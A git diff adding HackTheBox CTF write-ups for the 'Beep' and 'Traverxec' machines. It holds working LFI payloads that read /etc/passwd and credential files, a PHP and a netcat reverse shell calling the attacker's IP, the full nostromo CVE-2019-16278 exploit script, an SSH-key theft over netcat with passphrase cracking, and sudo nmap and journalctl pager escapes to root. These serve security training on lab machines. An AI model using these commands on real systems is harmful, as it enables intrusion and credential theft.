+ Webmin 1.580 - '/file/show.cgi' Remote Command Execution (Metasploit) | exploits/unix/remote/21851.rb
+ Webmin 1.850 - Multiple Vulnerabilities | exploits/cgi/webapps/42989.txt
+ Webmin 1.900 - Remote Command Execution (Metasploit) | exploits/cgi/remote/46201.rb
+ Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit) | exploits/linux/remote/46984.rb
+ Webmin 1.920 - Remote Code Execution | exploits/linux/webapps/47293.sh
+ Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit) | exploits/linux/remote/47230.rb
+ Webmin 1.x - HTML Email Command Execution | exploits/cgi/webapps/24574.txt
+ Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (PHP) | exploits/multiple/remote/1997.php
+ Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (Perl) | exploits/multiple/remote/2017.pl
+ phpMyWebmin 1.0 - 'target' Remote File Inclusion | exploits/php/webapps/2462.txt
+ phpMyWebmin 1.0 - 'window.php' Remote File Inclusion | exploits/php/webapps/2451.txt
+ **webmin 0.91 - Directory Traversal | exploits/cgi/remote/21183.txt**
+ --------------------------------------------------------------------------- ----------------------------------------
+ Shellcodes: No Result
+
+ nihilist [~] → searchsploit elastix
+ --------------------------------------------------------------------------- ----------------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ --------------------------------------------------------------------------- ----------------------------------------
+ Elastix - 'page' Cross-Site Scripting | exploits/php/webapps/38078.py
+ Elastix - Multiple Cross-Site Scripting Vulnerabilities | exploits/php/webapps/38544.txt
+ Elastix 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities | exploits/php/webapps/34942.txt
+ **Elastix 2.2.0 - 'graph.php' Local File Inclusion | exploits/php/webapps/37637.pl**
+ Elastix 2.x - Blind SQL Injection | exploits/php/webapps/36305.txt
+ Elastix < 2.5 - PHP Code Injection | exploits/php/webapps/38091.php
+ FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution | exploits/php/webapps/18650.py
+ --------------------------------------------------------------------------- ----------------------------------------
+ Shellcodes: No Result
+
+
+
+
+So we have a server here which is running Elastix on port 80 (http), let's see if we can list directories using a command like gobuster. Just to show another tool for this example, we'll use Dirbuster, which goes by the syntax "dirb http://10.10.10.7:80/"
+
+
+ λ nihilist [~] → dirb http://10.10.10.7:80/
+
+
+Dirbuster just found the vtigercm page, which is giving us yet another login page to work with. Fortunately for us vtigercrm is vulnerable to Local File Inclusion as displayed below in the searchsploit command output.
+
+
+ λ nihilist [~] → searchsploit vtiger
+ --------------------------------------------------------------------------- ----------------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ --------------------------------------------------------------------------- ----------------------------------------
+ Vtiger - 'Install' Remote Command Execution (Metasploit) | exploits/php/remote/32794.rb
+ Vtiger CRM 6.3.0 - (Authenticated) Arbitrary File Upload (Metasploit) | exploits/php/webapps/44379.rb
+ Vtiger CRM 7.1.0 - Remote Code Execution | exploits/php/webapps/46065.py
+ vTiger CRM 4.2 - 'calpath' Multiple Remote File Inclusions | exploits/php/webapps/2508.txt
+ vTiger CRM 4.2 - SQL Injection | exploits/php/webapps/26586.txt
+ vTiger CRM 4.2 Leads Module - 'record' Cross-Site Scripting | exploits/php/webapps/26584.txt
+ vTiger CRM 4.2 RSS Aggregation Module - Feed Cross-Site Scripting | exploits/php/webapps/26585.txt
+ vTiger CRM 5.0.4 - Local File Inclusion | exploits/php/webapps/16280.py
+ vTiger CRM 5.0.4 - Multiple Cross-Site Scripting Vulnerabilities | exploits/php/webapps/32307.txt
+ vTiger CRM 5.0.4 - Remote Code Execution / Cross-Site Request Forgery / Lo | exploits/php/webapps/9450.txt
+ **vTiger CRM 5.1.0 - Local File Inclusion | exploits/php/webapps/18770.txt**
+ vTiger CRM 5.2 - 'onlyforuser' SQL Injection | exploits/php/webapps/36208.txt
+ vTiger CRM 5.2.1 - 'PHPrint.php' Multiple Cross-Site Scripting Vulnerabili | exploits/php/webapps/36204.txt
+ vTiger CRM 5.2.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabiliti | exploits/php/webapps/36203.txt
+ vTiger CRM 5.2.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabiliti | exploits/php/webapps/36255.txt
+ vTiger CRM 5.2.1 - 'sortfieldsjson.php' Local File Inclusion | exploits/php/webapps/35574.txt
+ vTiger CRM 5.2.1 - 'vtigerservice.php' Cross-Site Scripting | exploits/php/webapps/35577.txt
+ vTiger CRM 5.3.0 5.4.0 - (Authenticated) Remote Code Execution (Metasploit | exploits/php/remote/29319.rb
+ vTiger CRM 5.4.0 - 'index.php?onlyforuser' SQL Injection | exploits/php/webapps/28409.txt
+ vTiger CRM 5.4.0 SOAP - AddEmailAttachment Arbitrary File Upload (Metasplo | exploits/php/remote/30787.rb
+ vTiger CRM 5.4.0 SOAP - Multiple Vulnerabilities | exploits/php/webapps/27279.txt
+ vTiger CRM 5.4.0/6.0 RC/6.0.0 GA - 'browse.php' Local File Inclusion | exploits/php/webapps/32213.txt
+ vTiger CRM 6.3.0 - (Authenticated) Remote Code Execution | exploits/php/webapps/38345.txt
+ --------------------------------------------------------------------------- ----------------------------------------
+ Shellcodes: No Result
+
+
+VtigerCRM seems to be vulnerable to Local File Inclusion (LFI), let's take a closer look onto [exploit-db](https://www.exploit-db.com/exploits/18770). According to the article, the CVE 2012-4867 would allow us to Include Local Files due to a vulnerable php script named **sortfieldsjson.php** Let's test it with the following URL our web browser :
+
+
+ https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00
+
+
+
+
+The LFI is successful, and We now have 2 usernames to work with : **fanis** and **root** We will now try out to see if we can get the user flag located in **/home/fanis** / Just for this example we'll print out the content of the page from within the terminal using the wget command using the following syntax : **wget -O - URL --no-check-certificate**
+
+
+ λ nihilist [~] → wget -O - https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php\?module_name\=../../../../../../../../home/fanis/user.txt%00 --no-check-certificate
+
+ --2019-11-09 15:00:39-- https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../home/fanis/user.txt%00
+ Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
+ Connecting to 10.10.10.7:443... connected.
+ WARNING: The certificate of ‘10.10.10.7’ is not trusted.
+ WARNING: The certificate of ‘10.10.10.7’ doesn't have a known issuer.
+ WARNING: The certificate of ‘10.10.10.7’ has expired.
+ The certificate has expired
+ The certificate's owner does not match hostname ‘10.10.10.7’
+ HTTP request sent, awaiting response... 200 OK
+ Length: 33 [text/html]
+ Saving to: ‘STDOUT’
+
+ - 0%[ ] 0 --.-KB/s
+ **aeXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX**
+ - 100%[==============================================>] 33 --.-KB/s in 0s
+
+ 2019-11-09 15:00:40 (286 KB/s) - written to stdout [33/33]
+
+
+We now have the user flag, but we are not able to get the root flag this way, we need to find a way to gain elevated privilege access.
+
+## **Part 3 : Getting Root Access**
+
+In order to gain our elevated privilege access, we need to look at the results of our previous **searchsploit** command with the elastix keyword. There seems to be yet another Local File Inclusion exploit that we could potentially use taking a closer look at the [exploit-db article](https://www.exploit-db.com/exploits/37637) : We see that there could be a LFI vulnerability contained within a php script named **"graph.php"**. Let's test if it is working here aswell.
+
+We will use the curl command for this example, just to show off yet another syntax we could use. **curl -vs URL -k**
+
+the output is preety massive so i will highlight the important parts :
+
+
+ λ nihilist [~] → curl -vs https://10.10.10.7/vtigercrm/graph.php\?current_language\=../../../../../../../..//etc/amportal.conf%00\&module;\=Accounts\&action; 2>&1 -k
+
+ [...]
+
+ # FreePBX Database configuration
+ # AMPDBHOST: Hostname where the FreePBX database resides
+ # AMPDBENGINE: Engine hosting the FreePBX database (e.g. mysql)
+ # AMPDBNAME: Name of the FreePBX database (e.g. asterisk)
+ # AMPDBUSER: Username used to connect to the FreePBX database
+ # AMPDBPASS: Password for AMPDBUSER (above)
+ # AMPENGINE: Telephony backend engine (e.g. asterisk)
+ # AMPMGRUSER: Username to access the Asterisk Manager Interface
+ # AMPMGRPASS: Password for AMPMGRUSER
+ #
+ AMPDBHOST=localhost
+ AMPDBENGINE=mysql
+ # AMPDBNAME=asterisk
+ AMPDBUSER=asteriskuser
+ # AMPDBPASS=amp109
+ **AMPDBPASS=jEhdIekWmdjE**
+ AMPENGINE=asterisk
+ **AMPMGRUSER=admin**
+ #AMPMGRPASS=amp111
+ AMPMGRPASS=jEhdIekWmdjE
+
+ [...]
+
+
+
+The second LFI is successful, we now have credentials that we can use on the vtigercrm login page. **admin:jEhdIekWmdjE**
+
+Once we are logged in , we simply need to browse into **Settings > Company Details** and inject our **reverse-shell.php** disguised as **reverse-shell.php.jpg**
+
+
+ λ nihilist [~/_HTB/Beep] → nano nihilist.php.jpg
+
+ <**?php exec("/bin/bash -c 'bash -i > & /dev/tcp/10.10.14.48/1234 0>&1'"); **?>
+
+ λ nihilist [~/_HTB/Beep] → nc -lvnp 1234
+
+
+
+
+at this point, all that is left to do is to upload our reverse shell, to browse to where the reverse shell is located, and to recieve the connection back to our Terminal running the netcat command used above.
+
+We will browse at this address : **http://10.10.10.7/vtigercrm/test/logo/nihilist.php.jpg**
+
+
+ λ nihilist [~/_HTB/Beep] → nc -lvnp 1234
+ Connection from 10.10.10.7:46306
+ bash: no job control in this shell
+
+ bash-3.2$ whoami
+ asterisk
+
+ bash-3.2$ uname -a
+ Linux beep 2.6.18-238.12.1.el5 #1 SMP Tue May 31 13:23:01 EDT 2011 i686 athlon i386 GNU/Linux
+
+ bash-3.2$ sudo -l
+ Matching Defaults entries for asterisk on this host:
+ env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR
+ LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE
+ LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC
+ LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
+ XAUTHORITY"
+
+ User asterisk may run the following commands on this host:
+ (root) NOPASSWD: /sbin/shutdown
+ **(root) NOPASSWD: /usr/bin/nmap**
+ (root) NOPASSWD: /usr/bin/yum
+ (root) NOPASSWD: /bin/touch
+ (root) NOPASSWD: /bin/chmod
+ (root) NOPASSWD: /bin/chown
+ (root) NOPASSWD: /sbin/service
+ (root) NOPASSWD: /sbin/init
+ (root) NOPASSWD: /usr/sbin/postmap
+ (root) NOPASSWD: /usr/sbin/postfix
+ (root) NOPASSWD: /usr/sbin/saslpasswd2
+ (root) NOPASSWD: /usr/sbin/hardware_detector
+ (root) NOPASSWD: /sbin/chkconfig
+ (root) NOPASSWD: /usr/sbin/elastix-helper
+
+
+
+We now have a reverse shell as asterisk, but we need to escalate privileges. We can use the nmap command which can be run as root for example.
+
+
+ bash-3.2$ sudo nmap --interactive
+
+ Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
+ Welcome to Interactive Mode -- press h for help
+ nmap> !sh
+
+ whoami
+ root
+
+ cat /root/root.txt
+ **d8XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX**
+
+
+
+And that's it ! we finally got the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/40.md b/Easy/40.md
new file mode 100644
index 0000000..87ba30f
--- /dev/null
+++ b/Easy/40.md
@@ -0,0 +1,524 @@
+# Traverxec Writeup
+
+
+
+## Introduction :
+
+Traverxec is an easy linux box released back in November 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/29 ] [Nextcloud/blog]
+ → sudo nmap -vvv -p- 10.10.10.165 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered
+ [sudo] password for nothing:
+ Discovered open port 80/tcp on 10.10.10.165
+ Discovered open port 22/tcp on 10.10.10.165
+
+ [ 10.10.14.13/23 ] [ /dev/pts/29 ] [Nextcloud/blog]
+ → nmap -sCV -p80,22 10.10.10.165
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-25 11:35 CEST
+ Nmap scan report for 10.10.10.165
+ Host is up (0.034s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
+ | ssh-hostkey:
+ | 2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
+ | 256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
+ |_ 256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
+ 80/tcp open http nostromo 1.9.6
+ |_http-server-header: nostromo 1.9.6
+ |_http-title: TRAVERXEC
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 8.07 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 running nostromo 1.9.6:
+
+
+
+You can run the scans you want on this webserver, you won't find much. But we do know that this is nostromo 1.9.6 so lets see if there are any CVEs:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [Nextcloud/blog]
+ → searchsploit nostromo 1.9
+ --------------------------------------------------------------------------------- ---------------------------------
+ Exploit Title | Path
+ --------------------------------------------------------------------------------- ---------------------------------
+ nostromo 1.9.6 - Remote Code Execution | multiple/remote/47837.py
+ nostromo nhttpd 1.9.3 - Directory Traversal Remote Command Execution | linux/remote/35466.sh
+ --------------------------------------------------------------------------------- ---------------------------------
+ Shellcodes: No Results
+
+
+
+And indeed this is an incredible coincidence that this nostromo version has a RCE vulnerability, so let's use it:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Traverxec]
+ → cp $(locate 47837.py) .
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Traverxec]
+ → vim 47837.py
+
+
+
+Looking at it in detail:
+
+
+ # Exploit Title: nostromo 1.9.6 - Remote Code Execution
+ # Date: 2019-12-31
+ # Exploit Author: Kr0ff
+ # Vendor Homepage:
+ # Software Link: http://www.nazgul.ch/dev/nostromo-1.9.6.tar.gz
+ # Version: 1.9.6
+ # Tested on: Debian
+ # CVE : CVE-2019-16278
+
+ #cve2019_16278.py
+
+ #!/usr/bin/env python
+
+ import sys
+ import socket
+
+ art = """
+
+ _____-2019-16278
+ _____ _______ ______ _____\ \
+ _____\ \_\ | | | / / | |
+ / /| || / / /|/ / /___/|
+ / / /____/||\ \ \ |/| |__ |___|/
+ | | |____|/ \ \ \ | | | \
+ | | _____ \| \| | | __/ __
+ |\ \|\ \ |\ /| |\ \ / \
+ | \_____\| | | \_______/ | | \____\/ |
+ | | /____/| \ | | / | | |____/|
+ \|_____| || \|_____|/ \|____| | |
+ |____|/ |___|/
+
+
+
+ """
+
+ help_menu = '\r\nUsage: cve2019-16278.py <****Target_IP> <****Target_Port> <****Command>'
+
+ def connect(soc):
+ response = ""
+ try:
+ while True:
+ connection = soc.recv(1024)
+ if len(connection) == 0:
+ break
+ response += connection
+ except:
+ pass
+ return response
+
+ def cve(target, port, cmd):
+ soc = socket.socket()
+ soc.connect((target, int(port)))
+ payload = 'POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\nContent-Length: 1\r\n\r\necho\necho\n{} 2> &1'.format(cmd)
+ soc.send(payload)
+ receive = connect(soc)
+ print(receive)
+
+ if __name__ == "__main__":
+
+ print(art)
+
+ try:
+ target = sys.argv[1]
+ port = sys.argv[2]
+ cmd = sys.argv[3]
+
+ cve(target, port, cmd)
+
+ except IndexError:
+ print(help_menu)
+
+
+
+This is a very simple python script, which sends a POST request to the ip and port pair we give it:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Traverxec]
+ → python 47837.py 10.10.10.165 80 id
+
+
+ _____-2019-16278
+ _____ _______ ______ _____\ \
+ _____\ \_\ | | | / / | |
+ / /| || / / /|/ / /___/|
+ / / /____/||\ \ \ |/| |__ |___|/
+ | | |____|/ \ \ \ | | | \
+ | | _____ \| \| | | __/ __
+ |\ \|\ \ |\ /| |\ \ / \
+ | \_____\| | | \_______/ | | \____\/ |
+ | | /____/| \ | | / | | |____/|
+ \|_____| || \|_____|/ \|____| | |
+ |____|/ |___|/
+
+
+
+
+ HTTP/1.1 200 OK
+ Date: Tue, 25 May 2021 15:48:12 GMT
+ Server: nostromo 1.9.6
+ Connection: close
+
+
+ uid=33(www-data) gid=33(www-data) groups=33(www-data)
+
+
+
+Indeed we get remote code execution as the www-data user, so we can get a reverse shell as follows:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Traverxec]
+ → python 47837.py 10.10.10.165 80 "nc -e bash 10.10.14.13 9001"
+
+
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/29 ] [~/HTB/Traverxec]
+ → nc -lvnp 9001
+ listening on [any] 9001 ...
+ connect to [10.10.14.13] from (UNKNOWN) [10.10.10.165] 54374
+
+ id
+ uid=33(www-data) gid=33(www-data) groups=33(www-data)
+
+
+Obviously this is a very limited shell, so let's upgrade it to a fully interactive shell, first we spawn a tty using python's pty module:
+
+
+ which python
+ /usr/bin/python
+ python -c 'import pty;pty.spawn("/bin/bash")'
+ www-data@traverxec:/usr/bin$
+
+ CTRL+Z
+
+ [ 10.10.14.13/23 ] [ /dev/pts/29 ] [~/HTB/Traverxec]
+ → stty raw echo ; fg
+
+ [1] + 3599725 continued nc -lvnp 9001
+ export TERM=screen-256color
+ www-data@traverxec:/usr/bin$ export SHELL=bash
+ www-data@traverxec:/usr/bin$ stty rows 40 columns 125
+ www-data@traverxec:/usr/bin$ reset
+
+
+
+And there you go ! We managed to get a fully interactive reverse shell:
+
+
+ www-data@traverxec:/usr/bin$ stty -a | grep rows
+ speed 38400 baud; rows 40; columns 125; line = 0;
+
+ www-data@traverxec:/usr/bin$ echo $TERM
+ screen-256color
+
+ www-data@traverxec:/usr/bin$ echo $SHELL
+ bash
+
+ www-data@traverxec:/usr/bin$ ls
+ Display all 666 possibilities? (y or n)
+
+
+Now from there we need to find a way to privesc:
+
+
+ www-data@traverxec:/usr/bin$ ls /home
+ david
+
+ www-data@traverxec:/usr/bin$ ls /home/david/user.txt
+ /home/david/user.txt
+
+ www-data@traverxec:/usr/bin$ ls /home/david/user.txt -lash
+ 4.0K -r--r----- 1 root david 33 Oct 25 2019 /home/david/user.txt
+
+
+
+We're going to attempt to privesc to the david user, so first let's enumerate the box using LinPEAS.sh:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/29 ] [~/HTB/Traverxec]
+ → cp $(locate linpeas.sh) .
+
+ [ 10.10.14.13/23 ] [ /dev/pts/29 ] [~/HTB/Traverxec]
+ → ls -lash linpeas.sh
+ 336K -rwxr-xr-x 1 nothing nothing 334K May 25 17:50 linpeas.sh
+
+ [ 10.10.14.13/23 ] [ /dev/pts/29 ] [~/HTB/Traverxec]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+
+
+Now download it onto the box:
+
+
+ www-data@traverxec:/dev/shm$ which wget ; which curl
+ /usr/bin/wget
+
+ www-data@traverxec:/dev/shm$ which wget ; which curl
+ /usr/bin/wget
+ www-data@traverxec:/dev/shm$ wget http://10.10.14.13:9090/linpeas.sh -O /dev/shm/peas.sh
+ --2021-05-25 11:59:40-- http://10.10.14.13:9090/linpeas.sh
+ Connecting to 10.10.14.13:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 341863 (334K) [text/x-sh]
+ Saving to: '/dev/shm/peas.sh'
+
+ /dev/shm/peas.sh 100%[====================================================>] 333.85K 690KB/s in 0.5s
+
+ 2021-05-25 11:59:41 (690 KB/s) - '/dev/shm/peas.sh' saved [341863/341863]
+
+ www-data@traverxec:/dev/shm$ chmod +x peas.sh
+ www-data@traverxec:/dev/shm$ ./peas.sh
+
+
+
+Here i uploaded the script to **/dev/shm** , which is basically an alternative to the **/tmp** directory.
+
+ 
+
+And indeed we are hinted towards the david user that seems to be part of quite a few groups, let's take a look at his home directory:
+
+
+ www-data@traverxec:/home/david$ cd public_www
+
+ www-data@traverxec:/home/david/public_www$ ls
+ index.html protected-file-area
+
+ www-data@traverxec:/home/david/public_www$ ls -lash
+ total 16K
+ 4.0K drwxr-xr-x 3 david david 4.0K Oct 25 2019 .
+ 4.0K drwx--x--x 5 david david 4.0K Oct 25 2019 ..
+ 4.0K -rw-r--r-- 1 david david 402 Oct 25 2019 index.html
+ 4.0K drwxr-xr-x 2 david david 4.0K Oct 25 2019 protected-file-area
+
+ www-data@traverxec:/home/david/public_www$ cat protected-file-area/
+ .htaccess backup-ssh-identity-files.tgz
+
+ www-data@traverxec:/home/david/public_www$ cat protected-file-area/.htaccess
+ realm David's Protected File Area. Keep out!
+
+ www-data@traverxec:/home/david/public_www/protected-file-area$ file backup-ssh-identity-files.tgz
+ backup-ssh-identity-files.tgz: gzip compressed data, last modified: Fri Oct 25 21:02:59 2019, from Unix, original size 10240
+
+ www-data@traverxec:/home/david/public_www/protected-file-area$ md5sum backup-ssh-identity-files.tgz
+ 084883c47fec5b1385b50f226db8175f backup-ssh-identity-files.tgz
+
+
+
+So here we seem to have a gzip archive called ssh backups, let's transfer it back to our local machine:
+
+
+ www-data@traverxec:/home/david/public_www/protected-file-area$ which nc
+ /usr/bin/nc
+
+ www-data@traverxec:/home/david/public_www/protected-file-area$ ls -lash
+ total 16K
+ 4.0K drwxr-xr-x 2 david david 4.0K Oct 25 2019 .
+ 4.0K drwxr-xr-x 3 david david 4.0K Oct 25 2019 ..
+ 4.0K -rw-r--r-- 1 david david 45 Oct 25 2019 .htaccess
+ 4.0K -rw-r--r-- 1 david david 1.9K Oct 25 2019 backup-ssh-identity-files.tgz
+
+
+
+Luckily for us, netcat is on the machine, so this will be easy to transfer the backup file:
+
+
+ www-data@traverxec:/home/david/public_www/protected-file-area$ md5sum backup-ssh-identity-files.tgz
+ 084883c47fec5b1385b50f226db8175f backup-ssh-identity-files.tgz
+
+ www-data@traverxec:/home/david/public_www/protected-file-area$ cat backup-ssh-identity-files.tgz | nc 10.10.14.13 9002
+
+
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/36 ] [~/HTB/Traverxec]
+ → nc -lvnp 9002 > backup.tgz
+ listening on [any] 9002 ...
+ connect to [10.10.14.13] from (UNKNOWN) [10.10.10.165] 54580
+
+ [ 10.10.14.13/23 ] [ /dev/pts/36 ] [~/HTB/Traverxec]
+ → md5sum backup.tgz
+ 084883c47fec5b1385b50f226db8175f backup.tgz
+
+
+
+And once the transfer is done, we see that both files have the same m4d5 hash, so we know that the transfer is complete, both files are the same. So let's extract it and make use of the ssh keys in there:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/36 ] [~/HTB/Traverxec]
+ → tar -xvf backup.tgz
+ home/david/.ssh/
+ home/david/.ssh/authorized_keys
+ home/david/.ssh/id_rsa
+ home/david/.ssh/id_rsa.pub
+
+ [ 10.10.14.13/23 ] [ /dev/pts/36 ] [~/HTB/Traverxec]
+ → chmod 600 home/david/.ssh/id_rsa
+
+ [ 10.10.14.13/23 ] [ /dev/pts/36 ] [~/HTB/Traverxec]
+ → ssh david@10.10.10.165 -i home/david/.ssh/id_rsa
+ The authenticity of host '10.10.10.165 (10.10.10.165)' can't be established.
+ ECDSA key fingerprint is SHA256:CiO/pUMzd+6bHnEhA2rAU30QQiNdWOtkEPtJoXnWzVo.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.10.10.165' (ECDSA) to the list of known hosts.
+ Enter passphrase for key 'home/david/.ssh/id_rsa':
+
+
+
+However not so fast! David's private key is encrypted with a password, so let's use john to crack it:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/36 ] [~/HTB/Traverxec]
+ → cd home/david/.ssh
+
+ [ 10.10.14.13/23 ] [ /dev/pts/36 ] [home/david/.ssh]
+ → locate ssh2john.py
+ /usr/share/john/ssh2john.py
+
+ [ 10.10.14.13/23 ] [ /dev/pts/36 ] [home/david/.ssh]
+ → /usr/share/john/ssh2john.py id_rsa > hash.txt
+
+ [ 10.10.14.13/23 ] [ /dev/pts/36 ] [home/david/.ssh]
+ → john -w=/usr/share/wordlists/rockyou.txt hash.txt
+ Using default input encoding: UTF-8
+ Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
+ Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
+ Cost 2 (iteration count) is 1 for all loaded hashes
+ Will run 4 OpenMP threads
+ Note: This format may emit false positives, so it will keep trying even after
+ finding a possible candidate.
+ Press 'q' or Ctrl-C to abort, almost any other key for status
+ hunter (id_rsa)
+
+
+And we now have david's password! so let's login using his ssh key:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/36 ] [home/david/.ssh]
+ → ssh david@10.10.10.165 -i id_rsa
+ Enter passphrase for key 'id_rsa':
+ Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
+ david@traverxec:~$ id
+ uid=1000(david) gid=1000(david) groups=1000(david),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
+ david@traverxec:~$ cat user.txt
+ 7dXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it, we managed to get the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now in order to privesc from the david user to the root user,
+
+
+ david@traverxec:~$ ls -lash
+ total 36K
+ 4.0K drwx--x--x 5 david david 4.0K Oct 25 2019 .
+ 4.0K drwxr-xr-x 3 root root 4.0K Oct 25 2019 ..
+ 0 lrwxrwxrwx 1 root root 9 Oct 25 2019 .bash_history -> /dev/null
+ 4.0K -rw-r--r-- 1 david david 220 Oct 25 2019 .bash_logout
+ 4.0K -rw-r--r-- 1 david david 3.5K Oct 25 2019 .bashrc
+ 4.0K drwx------ 2 david david 4.0K Oct 25 2019 bin
+ 4.0K -rw-r--r-- 1 david david 807 Oct 25 2019 .profile
+ 4.0K drwxr-xr-x 3 david david 4.0K Oct 25 2019 public_www
+ 4.0K drwx------ 2 david david 4.0K Oct 25 2019 .ssh
+ 4.0K -r--r----- 1 root david 33 Oct 25 2019 user.txt
+
+ david@traverxec:~$ ls -lash bin/server-stats.*
+ 4.0K -r-------- 1 david david 802 Oct 25 2019 bin/server-stats.head
+ 4.0K -rwx------ 1 david david 363 Oct 25 2019 bin/server-stats.sh
+
+ david@traverxec:~$ cat bin/server-stats.sh
+ #!/bin/bash
+
+ cat /home/david/bin/server-stats.head
+ echo "Load: `/usr/bin/uptime`"
+ echo " "
+ echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
+ echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
+ echo " "
+ echo "Last 5 journal log lines:"
+ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat
+
+
+Looking in the bin directory we see a bashscript that seems to do something interesting, it runs sudo journalctl, let's run it to see what it does:
+
+
+ david@traverxec:~/bin$ ./server-stats.sh
+ .----.
+ .---------. | == |
+ Webserver Statistics and Data |.-"""""-.| |----|
+ Collection Script || || | == |
+ (c) David, 2019 || || |----|
+ |'-.....-'| |::::|
+ '"")---(""' |___.|
+ /:::::::::::\" "
+ /:::=======:::\
+ jgs '"""""""""""""'
+
+ Load: 12:50:42 up 7:14, 1 user, load average: 0.00, 0.00, 0.00
+
+ Open nhttpd sockets: 1
+ Files in the docroot: 117
+
+ Last 5 journal log lines:
+ -- Logs begin at Tue 2021-05-25 05:35:56 EDT, end at Tue 2021-05-25 12:50:42 EDT. --
+ May 25 12:01:12 traverxec sudo[8197]: pam_unix(sudo:auth): authentication failure; logname= uid=33 euid=0 tty=/dev/pts/0 ruser=www-data rhost= user=www-data
+ May 25 12:01:15 traverxec sudo[8197]: pam_unix(sudo:auth): conversation failed
+ May 25 12:01:15 traverxec sudo[8197]: pam_unix(sudo:auth): auth could not identify password for [www-data]
+ May 25 12:01:15 traverxec sudo[8197]: www-data : command not allowed ; TTY=pts/0 ; PWD=/dev/shm ; USER=root ; COMMAND=list
+ May 25 12:01:15 traverxec nologin[8253]: Attempted login by UNKNOWN on UNKNOWN
+
+
+
+Basically the script returns the last 5 lines of the nostromo service logs using journalctl. So we can exploit it because journalctl invokes the default pager, which is likely to be the **less** utility. Therefore it is also possible to exploit this by running the last command like so:
+
+
+ #BEFORE
+ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat
+
+ #AFTER
+ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
+
+
+after running it we prefix commands with the **!** character, to run **/bin/sh**
+
+The trick here to trigger the less command is to shrink your terminal to just a few lines, and you will be able to spawn the root shell:
+
+
+ david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
+ -- Logs begin at Tue 2021-05-25 05:35:56 EDT, end at Tue 2021-05-25 12:59:28 EDT. --
+ !/bin/sh
+ # id
+ uid=0(root) gid=0(root) groups=0(root)
+ # cat /root/root.txt
